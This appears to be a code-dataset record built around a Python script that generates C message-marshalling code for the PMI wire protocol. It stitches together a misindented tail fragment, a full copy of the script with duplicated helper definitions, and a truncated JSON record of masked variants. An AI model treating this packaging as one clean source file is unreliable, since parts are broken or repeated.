print('', file=Out)
dump_id_to_str(Out, 'response')
print('', file=Out)
dump_funcs(Out)
def get_set_params(attrs):
    """Build the C parameter list for a PMIU_msg_set_* accessor function."""
    tlist = []
    for a in attrs:
        # bracket markers ('[' / ']') are bare strings, not [name, kind, tail]
        # triples, so the length test skips them
        if len(a) == 3:
            tlist.append(get_kind(a[1]) + get_var(a[0]))
    return ', '.join(tlist)
def get_get_params(attrs):
    """Build the C out-parameter (pointer) list for a PMIU_msg_get_* accessor."""
    tlist = []
    for a in attrs:
        # bracket markers ('[' / ']') are bare strings, not [name, kind, tail]
        # triples, so the length test skips them
        if len(a) == 3:
            tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))
    return ', '.join(tlist)
def get_var(name):
    """Map a wire attribute name to a C identifier ('-' becomes '_')."""
    return name.replace('-', '_')
def get_kind(kind):
    """Map a spec type keyword (INTEGER/STRING/BOOLEAN) to a C declaration prefix."""
    if kind == 'INTEGER':
        return 'int '
    elif kind == 'STRING':
        return 'const char *'
    elif kind == 'BOOLEAN':
        return 'bool '
    else:
        raise Exception('unexpected kind ' + kind)
def attrs_identical(attrs_a, attrs_b):
    """Return True when the two attribute lists match element-wise on name, kind and tail."""
    if len(attrs_a) != len(attrs_b):
        return False
    for i in range(len(attrs_a)):
        a = attrs_a[i]
        b = attrs_b[i]
        if a[0] != b[0] or a[1] != b[1] or a[2] != b[2]:
            return False
    return True
def dump_copyright(out):
    """Emit the standard C copyright banner plus the auto-generated notice."""
    print('/*', file=out)
    print(' * Copyright (C) by Argonne National Laboratory', file=out)
    print(' * See COPYRIGHT in top-level directory', file=out)
    print(' */', file=out)
    print('', file=out)
    print('/* ** This file is auto-generated, do not edit ** */', file=out)
    print('', file=out)
def get_include_guard(h_file):
    """Derive the include-guard macro from a header path (src/pmi_msg.h -> PMI_MSG_H_INCLUDED)."""
    h_file = re.sub('.*\\/', '', h_file)
    h_file = re.sub('\\.', '_', h_file)
    return h_file.upper() + '_INCLUDED'
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
##
## Copyright (C) by Argonne National Laboratory
## See COPYRIGHT in top-level directory
##
import re
import os
class G:
    """Module-global parse state shared by load_pmi_txt() and dump_all()."""
    pmi_vers = []  # one dict per spec file: {"version": ..., NAME: cmd-dict, ...}
    cmd_list = []  # command NAMEs in first-seen order (drives output ordering)
    cmd_hash = {}  # NAME -> cmd-dict from the first version that defined it
class RE:
    """Tiny re wrapper that remembers the last match object in RE.m.

    Always called on the class itself, e.g. RE.match(pat, line); the methods
    are therefore plain static helpers.  Marking them @staticmethod makes that
    explicit and keeps them safe even if ever invoked through an instance.
    """
    m = None  # last match object produced by match()/search()

    @staticmethod
    def match(pat, str, flags=0):
        """re.match that also stores the result in RE.m."""
        # parameter name `str` kept for compatibility (it shadows the builtin)
        RE.m = re.match(pat, str, flags)
        return RE.m

    @staticmethod
    def search(pat, str, flags=0):
        """re.search that also stores the result in RE.m."""
        RE.m = re.search(pat, str, flags)
        return RE.m
def main():
    """Generate src/pmi_msg.h and src/pmi_msg.c from the wire-protocol specs."""
    # run from pmi top_srcdir
    load_pmi_txt("maint/pmi-1.1.txt", "1.1")
    load_pmi_txt("maint/pmi-2.0.txt", "2.0")
    dump_all()
def load_pmi_txt(pmi_txt, ver):
    """Parse one PMI wire spec file into G.pmi_vers / G.cmd_list / G.cmd_hash.

    Recognized line shapes:
      "NAME:"            -- start of a command block
      "  Q: cmd ..."     -- query wire name ("R:" for the response)
      "  attr: KIND ..." -- one attribute of the current Q/R section
      "  [" or "  ]"     -- optional-group bracket, stored as a bare string

    Fix: dropped the local prev_cmd, which was assigned in both branches of
    the command-header case but never read anywhere (dead code).
    """
    cur_hash = {"version": ver}
    G.pmi_vers.append(cur_hash)
    cur_cmd = None
    cur_attrs = None
    with open(pmi_txt, "r") as In:
        for line in In:
            if RE.match(r'([A-Z]+):', line):
                # command header line, e.g. "BARRIER:"
                name = RE.m.group(1)
                cur_cmd = {"version": ver}  # query-name, query-attrs, response-name, response-attrs
                cur_hash[name] = cur_cmd
                if name not in G.cmd_hash:
                    # the first version to define a command owns the canonical entry
                    G.cmd_list.append(name)
                    G.cmd_hash[name] = cur_cmd
            elif RE.match(r'\s+([QR]):\s*([\w-]+)(.*)', line):
                # query (Q) or response (R) wire-command name
                QR, cmd, tail = RE.m.group(1, 2, 3)
                cur_attrs = []
                if QR == "Q":
                    cur_cmd["query-name"] = cmd
                    if RE.match(r'.*wire=.+', tail):
                        # spawn - we'll manually code it
                        cur_cmd["query-attrs"] = []
                    else:
                        cur_cmd["query-attrs"] = cur_attrs
                else:
                    cur_cmd["response-name"] = cmd
                    cur_cmd["response-attrs"] = cur_attrs
            elif RE.match(r'\s+([\w-]+):\s*([A-Z]+)(.*)', line):
                # attribute line: name, KIND keyword, trailing options
                name, kind, tail = RE.m.group(1, 2, 3)
                cur_attrs.append([name, kind, tail])
            elif RE.match(r'\s+([\[\]])', line):
                # bracket markers are appended as bare one-character strings
                cur_attrs.append(RE.m.group(1))
def dump_all():
    """Generate src/pmi_msg.h and src/pmi_msg.c from the tables filled in by load_pmi_txt().

    Each nested helper emits one section of C source into the stream Out; the
    code at the bottom opens the two output files and invokes them in order.
    """
    def dump_enums(Out):
        """Emit "enum PMIU_CMD_ID" with one PMIU_CMD_<NAME> member per command."""
        print("enum PMIU_CMD_ID {", file=Out)
        print("    PMIU_CMD_INVALID,", file=Out)
        for NAME in G.cmd_list:
            print("    PMIU_CMD_%s," % NAME, file=Out)
        print("};", file=Out)
        print("", file=Out)
    def dump_decls(Out):
        """Emit prototypes for the per-command set/get accessor functions (for the header)."""
        std_query="struct PMIU_cmd *pmi_query, int version, bool is_static"
        std_response="struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static"
        std_get="struct PMIU_cmd *pmi"
        for NAME in G.cmd_list:
            name = NAME.lower()
            # collect this command's entry from every protocol version that defines it
            v_list = []
            for v in G.pmi_vers:
                if NAME in v:
                    v_list.append(v[NAME])
            v0 = v_list[0]
            decls = []
            if "query-name" in v0:
                if len(v0["query-attrs"]):
                    params = get_set_params(v0["query-attrs"])
                    decls.append("void PMIU_msg_set_query_%s(%s, %s);" % (name, std_query, params))
                    params = get_get_params(v0["query-attrs"])
                    decls.append("int PMIU_msg_get_query_%s(%s, %s);" % (name, std_get, params))
            if "response-name" in v0:
                if len(v0["response-attrs"]):
                    params = get_set_params(v0["response-attrs"])
                    decls.append("int PMIU_msg_set_response_%s(%s, %s);" % (name, std_response, params))
                    params = get_get_params(v0["response-attrs"])
                    decls.append("int PMIU_msg_get_response_%s(%s, %s);" % (name, std_get, params))
            if len(decls):
                print("/* PMIU_CMD_%s */" % NAME, file=Out)
                for l in decls:
                    print(l, file=Out)
    def dump_cmd_to_id(Out):
        """Emit PMIU_msg_cmd_to_id(): map a wire command string to its enum id."""
        print("int PMIU_msg_cmd_to_id(const char *cmd)", file=Out)
        print("{", file=Out)
        t_if = "    if"
        for NAME in G.cmd_list:
            # one strcmp per distinct wire name across versions (deduplicated via prev)
            cmp_list = []
            prev = {}
            for v in G.pmi_vers:
                if NAME in v and "query-name" in v[NAME]:
                    t = v[NAME]["query-name"]
                    if t not in prev:
                        cmp_list.append("strcmp(cmd, \"%s\") == 0" % t)
                        prev[t] = 1
            if len(cmp_list):
                print(t_if + " (" + ' || '.join(cmp_list) + ") {", file=Out)
                print("        return PMIU_CMD_%s;" % NAME, file=Out)
                t_if = "    } else if"
        print("    } else {", file=Out)
        print("        return PMIU_CMD_INVALID;", file=Out)
        print("    }", file=Out)
        print("}", file=Out)
    def dump_id_to_str(Out, query):
        """Emit PMIU_msg_id_to_<query|response>(): map an enum id back to a wire name.

        When v1 and v2 use different wire names for the same command, the
        generated C selects on the version argument.
        """
        namekey = query + "-name"
        print("const char *PMIU_msg_id_to_%s(int version, int cmd_id)" % query, file=Out)
        print("{", file=Out)
        print("    switch(cmd_id) {", file=Out)
        for NAME in G.cmd_list:
            cmp_list = []
            prev = {}
            for v in G.pmi_vers:
                if NAME in v and namekey in v[NAME]:
                    t = v[NAME][namekey]
                    if t not in prev:
                        cmp_list.append(t)
                        prev[t] = 1
            if len(cmp_list) > 0:
                print("        case PMIU_CMD_%s:" % NAME, file=Out)
                if len(cmp_list) == 1:
                    print("            return \"%s\";" % cmp_list[0], file=Out)
                else:
                    print("            return (version == PMIU_WIRE_V1) ? \"%s\" : \"%s\";" % (cmp_list[0], cmp_list[1]), file=Out)
        print("        default:", file=Out)
        print("            return NULL;", file=Out)
        print("    }", file=Out)
        print("}", file=Out)
    # NOTE(review): dump_id_to_response is never called below -- it emits only
    # a default branch and looks like dead code; confirm before removing.
    def dump_id_to_response(Out):
        """Emit a stub PMIU_msg_id_to_response() that always returns NULL."""
        print("const char *PMIU_msg_id_to_response(int version, int cmd_id)", file=Out)
        print("{", file=Out)
        print("    switch(cmd_id) {", file=Out)
        print("        default:", file=Out)
        print("            return NULL;", file=Out)
        print("    }", file=Out)
        print("}", file=Out)
    def dump_funcs(Out):
        """Emit the bodies of all set/get accessor functions (for the C source file)."""
        std_query="struct PMIU_cmd *pmi_query, int version, bool is_static"
        std_response="struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static"
        std_get="struct PMIU_cmd *pmi"
        def dump_if_version(t_if, version, is_set, is_query):
            """Emit an if/else-if header that selects on the wire protocol version."""
            if re.match(r"1\.", version):
                ver = "PMIU_WIRE_V1"
            else:
                ver = "PMIU_WIRE_V2"
            if is_set:
                if is_query:
                    print(t_if + " (version == %s) {" % ver, file=Out)
                else:
                    print(t_if + " (pmi_query->version == %s) {" % ver, file=Out)
            else:
                print(t_if + " (pmi->version == %s) {" % ver, file=Out)
        def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
            """Emit one add/get line per attribute; return the count of non-optional getters.

            attrs supplies the wire names/kinds for the version being emitted;
            attrs0 supplies the C variable names (always the first version's
            list) so both version branches share one parameter list.
            """
            non_optional = 0
            for i in range(len(attrs)):
                a = attrs[i]
                var = get_var(attrs0[i][0])
                if is_query:
                    pmi = "pmi_query"
                else:
                    pmi = "pmi_resp"
                if a[1] == "INTEGER":
                    kind = "int"
                elif a[1] == "STRING":
                    kind = "str"
                elif a[1] == "BOOLEAN":
                    kind = "bool"
                else:
                    raise Exception("Unhandled kind: " + a[1])
                if is_set:
                    pmiu = "PMIU_cmd_add_" + kind
                    print(spaces + "%s(%s, \"%s\", %s);" % (pmiu, pmi, a[0], var), file=Out)
                else:
                    if RE.match(r'.*optional=(\S+)', a[2]):
                        # "optional=<dflt>" in the spec tail selects the
                        # WITH_DEFAULT getter macro with that default value
                        dflt = RE.m.group(1)
                        pmiu = "PMIU_CMD_GET_%sVAL_WITH_DEFAULT" % kind.upper()
                        print(spaces + "%s(pmi, \"%s\", *%s, %s);" % (pmiu, a[0], var, dflt), file=Out)
                    else:
                        pmiu = "PMIU_CMD_GET_%sVAL" % kind.upper()
                        print(spaces + "%s(pmi, \"%s\", *%s);" % (pmiu, a[0], var), file=Out)
                        non_optional += 1
            return non_optional
        def dump_it(NAME, v_list, is_set, is_query, attrs):
            """Emit one complete accessor function for command NAME.

            Relies on `name` (lowercased NAME) from the enclosing loop via closure.
            """
            print("", file=Out)
            ret_errno = True
            if is_set:
                params = get_set_params(attrs)
                if is_query:
                    # set_query returns void, so no pmi_errno plumbing is emitted
                    ret_errno = False
                    print("void PMIU_msg_set_query_%s(%s, %s)" % (name, std_query, params), file=Out)
                else:
                    print("int PMIU_msg_set_response_%s(%s, %s)" % (name, std_response, params), file=Out)
            else:
                params = get_get_params(attrs)
                if is_query:
                    print("int PMIU_msg_get_query_%s(%s, %s)" % (name, std_get, params), file=Out)
                else:
                    print("int PMIU_msg_get_response_%s(%s, %s)" % (name, std_get, params), file=Out)
            print("{", file=Out)
            if ret_errno:
                print("    int pmi_errno = PMIU_SUCCESS;", file=Out)
                print("", file=Out)
            if is_set:
                if is_query:
                    print("    PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);" % NAME, file=Out)
                else:
                    print("    PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);" % NAME, file=Out)
                    print("    pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);", file=Out)
            # attrs_b is the second protocol version's attribute list, if any
            attrs_b = None
            if len(v_list) > 1:
                if is_query:
                    attrs_b = v_list[1]["query-attrs"]
                else:
                    attrs_b = v_list[1]["response-attrs"]
            non_optional = 0
            if attrs_b is None or attrs_identical(attrs, attrs_b):
                non_optional += dump_attrs("    ", is_set, is_query, attrs, attrs)
            else:
                # versions disagree: branch on the wire version at run time
                dump_if_version("    if", v_list[0]["version"], is_set, is_query)
                non_optional += dump_attrs("        ", is_set, is_query, attrs, attrs)
                dump_if_version("    } else if", v_list[1]["version"], is_set, is_query)
                non_optional += dump_attrs("        ", is_set, is_query, attrs_b, attrs)
                if ret_errno:
                    print("    } else {", file=Out)
                    print("        PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");", file=Out)
                    non_optional += 1
                print("    }", file=Out)
            # fn_exit/fn_fail labels are emitted only when something above can
            # jump to them (presumably the PMIU_CMD_GET_* / PMIU_ERR_SETANDJUMP
            # macros goto fn_fail -- TODO confirm against the PMI utility headers)
            if non_optional > 0:
                print("", file=Out)
                print("  fn_exit:", file=Out)
                print("    return pmi_errno;", file=Out)
                print("  fn_fail:", file=Out)
                print("    goto fn_exit;", file=Out)
            elif ret_errno:
                print("", file=Out)
                print("    return pmi_errno;", file=Out)
            print("}", file=Out)
        for NAME in G.cmd_list:
            name = NAME.lower()
            v_list = []
            for v in G.pmi_vers:
                if NAME in v:
                    v_list.append(v[NAME])
            v0 = v_list[0]
            if "query-name" in v0:
                if len(v0["query-attrs"]):
                    dump_it(NAME, v_list, True, True, v0["query-attrs"])
                    dump_it(NAME, v_list, False, True, v0["query-attrs"])
            if "response-name" in v0:
                if len(v0["response-attrs"]):
                    dump_it(NAME, v_list, True, False, v0["response-attrs"])
                    dump_it(NAME, v_list, False, False, v0["response-attrs"])
    # ----------------------
    # write the header first, then the C source
    msg_h = "src/pmi_msg.h"
    msg_c = "src/pmi_msg.c"
    with open(msg_h, "w") as Out:
        dump_copyright(Out)
        INC = get_include_guard(msg_h)
        print("#ifndef %s" % INC, file=Out)
        print("#define %s" % INC, file=Out)
        print("", file=Out)
        dump_enums(Out)
        print("", file=Out)
        dump_decls(Out)
        print("", file=Out)
        print("#endif /* %s */" % INC, file=Out)
    with open(msg_c, "w") as Out:
        dump_copyright(Out)
        for inc in ["pmi_config", "mpl", "pmi_util", "pmi_common", "pmi_wire", "pmi_msg"]:
            print("#include \"%s.h\"\n" % inc, file=Out)
        dump_cmd_to_id(Out)
        print("", file=Out)
        dump_id_to_str(Out, "query")
        print("", file=Out)
        dump_id_to_str(Out, "response")
        print("", file=Out)
        dump_funcs(Out)
#---- utils ------------------------------------
def get_set_params(attrs):
    """Build the C parameter list for a set-side (input) message function.

    Only 3-element entries ([name, kind, tail]) contribute a parameter;
    single-character group markers are skipped.
    """
    parts = [get_kind(a[1]) + get_var(a[0]) for a in attrs if len(a) == 3]
    return ', '.join(parts)
def get_get_params(attrs):
    """Build the C parameter list for a get-side (output) message function.

    Like get_set_params, but each attribute is passed by pointer so the
    callee can fill it in.  Non-triple entries (group markers) are skipped.
    """
    parts = [get_kind(a[1]) + '*' + get_var(a[0]) for a in attrs if len(a) == 3]
    return ', '.join(parts)
def get_var(name):
    """Map a wire attribute name to a legal C identifier (dashes become underscores)."""
    return '_'.join(name.split('-'))
def get_kind(kind):
    """Translate a wire-format attribute kind into its C type prefix.

    The returned string includes any trailing space/star so it can be
    concatenated directly with a variable name.  Raises Exception for
    kinds that have no C mapping.
    """
    c_types = {
        'INTEGER': 'int ',
        'STRING': 'const char *',
        'BOOLEAN': 'bool ',
    }
    if kind in c_types:
        return c_types[kind]
    raise Exception('unexpected kind ' + kind)
def attrs_identical(attrs_a, attrs_b):
    """Return True if two attribute lists match element for element.

    Entries are either [name, kind, tail] triples or single-character
    group markers ("[" / "]") appended by load_pmi_txt.  The previous
    implementation indexed a[1] and a[2] unconditionally, which raised
    IndexError whenever both lists carried a one-char marker at the same
    position.  Plain sequence equality compares triples field-by-field
    (they always have exactly three fields) and markers by value, and
    still returns False when the lengths differ.
    """
    return attrs_a == attrs_b
# ---- dump utils -----------------------------------------
def dump_copyright(out):
    """Write the standard copyright / auto-generated banner to *out*."""
    banner = (
        "/*",
        " * Copyright (C) by Argonne National Laboratory",
        " * See COPYRIGHT in top-level directory",
        " */",
        "",
        "/* ** This file is auto-generated, do not edit ** */",
        "",
    )
    for line in banner:
        print(line, file=out)
def get_include_guard(h_file):
    """Derive a C include-guard macro name from a header file path.

    Strips any leading directories, turns dots into underscores, and
    upper-cases the result, e.g. "src/pmi_msg.h" -> "PMI_MSG_H_INCLUDED".
    """
    base = h_file.rsplit('/', 1)[-1]
    return base.replace('.', '_').upper() + '_INCLUDED'
# ---------------------------------------------------------
if __name__ == "__main__":
    # Script entry point: regenerates the PMI message marshalling code
    # (dump_all writes src/pmi_msg.h and src/pmi_msg.c).
    main()
|
flexible
|
{
"blob_id": "76382f353c47747ee730d83c2d3990049c4b0d98",
"index": 6795,
"step-1": "<mask token>\n\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\n\nclass RE:\n m = None\n\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\n\n<mask token>\n\n\ndef dump_all():\n\n def dump_enums(Out):\n print('enum PMIU_CMD_ID {', file=Out)\n print(' PMIU_CMD_INVALID,', file=Out)\n for NAME in G.cmd_list:\n print(' PMIU_CMD_%s,' % NAME, file=Out)\n print('};', file=Out)\n print('', file=Out)\n\n def dump_decls(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n params = get_set_params(v0['query-attrs'])\n decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (\n name, std_query, params))\n params = get_get_params(v0['query-attrs'])\n decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (\n name, std_get, params))\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n params = get_set_params(v0['response-attrs'])\n decls.append('int PMIU_msg_set_response_%s(%s, %s);' %\n (name, std_response, params))\n params = get_get_params(v0['response-attrs'])\n decls.append('int PMIU_msg_get_response_%s(%s, %s);' %\n (name, std_get, params))\n if len(decls):\n print('/* PMIU_CMD_%s */' % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)\n print('{', file=Out)\n t_if = ' if'\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and 'query-name' in v[NAME]:\n t = v[NAME]['query-name']\n if t not in prev:\n cmp_list.append('strcmp(cmd, 
\"%s\") == 0' % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)\n print(' return PMIU_CMD_%s;' % NAME, file=Out)\n t_if = ' } else if'\n print(' } else {', file=Out)\n print(' return PMIU_CMD_INVALID;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + '-name'\n print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %\n query, file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(' case PMIU_CMD_%s:' % NAME, file=Out)\n if len(cmp_list) == 1:\n print(' return \"%s\";' % cmp_list[0], file=Out)\n else:\n print(\n ' return (version == PMIU_WIRE_V1) ? \"%s\" : \"%s\";'\n % (cmp_list[0], cmp_list[1]), file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_response(Out):\n print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',\n file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_funcs(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match('1\\\\.', version):\n ver = 'PMIU_WIRE_V1'\n else:\n ver = 'PMIU_WIRE_V2'\n if is_set:\n if is_query:\n print(t_if + ' (version == %s) {' % ver, file=Out)\n else:\n print(t_if + ' (pmi_query->version == %s) {' % ver,\n file=Out)\n else:\n print(t_if + ' (pmi->version == %s) {' % ver, file=Out)\n\n def 
dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = 'pmi_query'\n else:\n pmi = 'pmi_resp'\n if a[1] == 'INTEGER':\n kind = 'int'\n elif a[1] == 'STRING':\n kind = 'str'\n elif a[1] == 'BOOLEAN':\n kind = 'bool'\n else:\n raise Exception('Unhandled kind: ' + a[1])\n if is_set:\n pmiu = 'PMIU_cmd_add_' + kind\n print(spaces + '%s(%s, \"%s\", %s);' % (pmiu, pmi, a[0],\n var), file=Out)\n elif RE.match('.*optional=(\\\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s, %s);' % (pmiu, a[0],\n var, dflt), file=Out)\n else:\n pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s);' % (pmiu, a[0], var\n ), file=Out)\n non_optional += 1\n return non_optional\n\n def dump_it(NAME, v_list, is_set, is_query, attrs):\n print('', file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print('void PMIU_msg_set_query_%s(%s, %s)' % (name,\n std_query, params), file=Out)\n else:\n print('int PMIU_msg_set_response_%s(%s, %s)' % (name,\n std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print('int PMIU_msg_get_query_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n else:\n print('int PMIU_msg_get_response_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n print('{', file=Out)\n if ret_errno:\n print(' int pmi_errno = PMIU_SUCCESS;', file=Out)\n print('', file=Out)\n if is_set:\n if is_query:\n print(\n ' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'\n % NAME, file=Out)\n else:\n print(\n ' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %\n NAME, file=Out)\n print(\n ' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'\n , file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1]['query-attrs']\n 
else:\n attrs_b = v_list[1]['response-attrs']\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(' ', is_set, is_query, attrs,\n attrs)\n else:\n dump_if_version(' if', v_list[0]['version'], is_set,\n is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs, attrs)\n dump_if_version(' } else if', v_list[1]['version'],\n is_set, is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs_b, attrs)\n if ret_errno:\n print(' } else {', file=Out)\n print(\n ' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");'\n , file=Out)\n non_optional += 1\n print(' }', file=Out)\n if non_optional > 0:\n print('', file=Out)\n print(' fn_exit:', file=Out)\n print(' return pmi_errno;', file=Out)\n print(' fn_fail:', file=Out)\n print(' goto fn_exit;', file=Out)\n elif ret_errno:\n print('', file=Out)\n print(' return pmi_errno;', file=Out)\n print('}', file=Out)\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n dump_it(NAME, v_list, True, True, v0['query-attrs'])\n dump_it(NAME, v_list, False, True, v0['query-attrs'])\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n dump_it(NAME, v_list, True, False, v0['response-attrs'])\n dump_it(NAME, v_list, False, False, v0['response-attrs'])\n msg_h = 'src/pmi_msg.h'\n msg_c = 'src/pmi_msg.c'\n with open(msg_h, 'w') as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print('#ifndef %s' % INC, file=Out)\n print('#define %s' % INC, file=Out)\n print('', file=Out)\n dump_enums(Out)\n print('', file=Out)\n dump_decls(Out)\n print('', file=Out)\n print('#endif /* %s */' % INC, file=Out)\n with open(msg_c, 'w') as Out:\n dump_copyright(Out)\n for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',\n 'pmi_wire', 'pmi_msg']:\n print('#include \"%s.h\"\\n' % inc, file=Out)\n 
dump_cmd_to_id(Out)\n print('', file=Out)\n dump_id_to_str(Out, 'query')\n print('', file=Out)\n dump_id_to_str(Out, 'response')\n print('', file=Out)\n dump_funcs(Out)\n\n\n<mask token>\n\n\ndef get_var(name):\n return name.replace('-', '_')\n\n\ndef get_kind(kind):\n if kind == 'INTEGER':\n return 'int '\n elif kind == 'STRING':\n return 'const char *'\n elif kind == 'BOOLEAN':\n return 'bool '\n else:\n raise Exception('unexpected kind ' + kind)\n\n\n<mask token>\n\n\ndef get_include_guard(h_file):\n h_file = re.sub('.*\\\\/', '', h_file)\n h_file = re.sub('\\\\.', '_', h_file)\n return h_file.upper() + '_INCLUDED'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\n\nclass RE:\n m = None\n\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\n\ndef main():\n load_pmi_txt('maint/pmi-1.1.txt', '1.1')\n load_pmi_txt('maint/pmi-2.0.txt', '2.0')\n dump_all()\n\n\n<mask token>\n\n\ndef dump_all():\n\n def dump_enums(Out):\n print('enum PMIU_CMD_ID {', file=Out)\n print(' PMIU_CMD_INVALID,', file=Out)\n for NAME in G.cmd_list:\n print(' PMIU_CMD_%s,' % NAME, file=Out)\n print('};', file=Out)\n print('', file=Out)\n\n def dump_decls(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n params = get_set_params(v0['query-attrs'])\n decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (\n name, std_query, params))\n params = get_get_params(v0['query-attrs'])\n decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (\n name, std_get, params))\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n params = get_set_params(v0['response-attrs'])\n decls.append('int PMIU_msg_set_response_%s(%s, %s);' %\n (name, std_response, params))\n params = get_get_params(v0['response-attrs'])\n decls.append('int PMIU_msg_get_response_%s(%s, %s);' %\n (name, std_get, params))\n if len(decls):\n print('/* PMIU_CMD_%s */' % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)\n print('{', file=Out)\n t_if = ' if'\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in 
